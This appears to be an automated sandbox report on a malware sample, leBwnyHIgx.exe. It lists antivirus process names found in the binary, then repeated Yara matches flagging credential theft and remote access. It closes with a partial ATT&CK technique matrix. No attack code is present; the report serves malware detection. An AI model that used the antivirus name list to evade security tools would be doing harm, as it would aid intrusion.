                      Source: leBwnyHIgx.exe Binary or memory string: TMBMSRV.exe
                      Source: leBwnyHIgx.exe Binary or memory string: 360Tray.exe
                      Source: leBwnyHIgx.exe Binary or memory string: avgwdsvc.exe
                      Source: leBwnyHIgx.exe Binary or memory string: AYAgent.aye
                      Source: leBwnyHIgx.exe Binary or memory string: QUHLPSVC.EXE
                      Source: leBwnyHIgx.exe Binary or memory string: RavMonD.exe
                      Source: leBwnyHIgx.exe Binary or memory string: Mcshield.exe
                      Source: leBwnyHIgx.exe Binary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.44e05eb.12.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.12.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.37.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.30.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.925ddb.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.428486b.10.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.29.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.3fe80cb.28.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.31.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.11.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.3070000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.2ef05bf.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.2df1053.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.32.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.23.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.34.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.3fe80cb.28.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.428486b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.13.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.32.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.4511bf3.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.36.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.3fe80cb.35.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.33.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.2df1053.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.21.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.20.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.23.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.4511bf3.11.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.90edfb.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.37.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.925ddb.25.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.2c51004.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.10.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.90edfb.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.3fe80cb.35.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.31.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.15.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.20.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.14.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.29.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.21.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.24.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.2ef05bf.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.3fe80cb.19.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.27.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.2c51004.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.33.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.27.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.454380b.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.34.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.8fe043.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.3fe10a3.17.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.92fcab.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.26.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.92fcab.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.3fe80cb.22.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.8.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.454380b.13.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.3fe80cb.22.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.3070000.8.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.3fe80cb.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.428486b.26.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.36.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.leBwnyHIgx.exe.4252c53.30.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.leBwnyHIgx.exe.44e05eb.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2916173628.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3847762945.000000000092F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2231349112.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3992441735.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134424377.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3282299406.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107580457.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3847713177.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2956428544.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2729342507.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2956631944.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3635220624.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4135196957.00000000044E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134301268.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3807432806.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2394511408.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2092467129.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462916069.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2916173628.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3787990039.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462635907.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2394414538.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2231413227.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134547256.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4135092176.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3148323285.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2729432226.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462916069.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107145495.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107580457.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: leBwnyHIgx.exe PID: 180, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.44e05eb.12.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.12.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.37.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.30.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.925ddb.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.428486b.10.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.29.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.3fe80cb.28.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.31.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.11.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.3070000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.2ef05bf.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.7.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.2df1053.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.32.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.23.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.34.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.3fe80cb.28.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.428486b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.13.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.32.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.4511bf3.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.36.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.3fe80cb.35.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.33.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.2df1053.6.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.21.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.20.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.23.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.4511bf3.11.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.90edfb.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.37.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.925ddb.25.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.2c51004.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.10.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.90edfb.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.3fe80cb.35.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.31.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.15.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.20.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.6.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.14.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.5.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.29.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.21.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.24.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.2ef05bf.7.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.3fe80cb.19.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.27.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.2c51004.5.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.33.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.27.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.454380b.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.34.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.8fe043.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.3fe10a3.17.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.92fcab.1.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.26.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.92fcab.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.3fe80cb.22.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.8.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.454380b.13.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.3fe80cb.22.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.3070000.8.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.3fe80cb.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.428486b.26.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.36.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.3.leBwnyHIgx.exe.4252c53.30.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.leBwnyHIgx.exe.44e05eb.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2916173628.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3847762945.000000000092F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2231349112.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3992441735.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.4134424377.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3282299406.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3107580457.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3847713177.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2956428544.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2729342507.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2956631944.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3635220624.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.4135196957.00000000044E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.4134301268.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3807432806.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2394511408.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2092467129.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3462916069.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2916173628.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3787990039.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3462635907.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2394414538.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2231413227.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.4134547256.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.4135092176.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3148323285.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.2729432226.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3462916069.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3107145495.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000003.3107580457.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: leBwnyHIgx.exe PID: 180, type: MEMORYSTR

                      ATT&CK Matrix (techniques listed per tactic; a leading number is the count shown in the original cell)

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
                      Initial Access: 1 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
                      Execution: 1 Native API; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
                      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
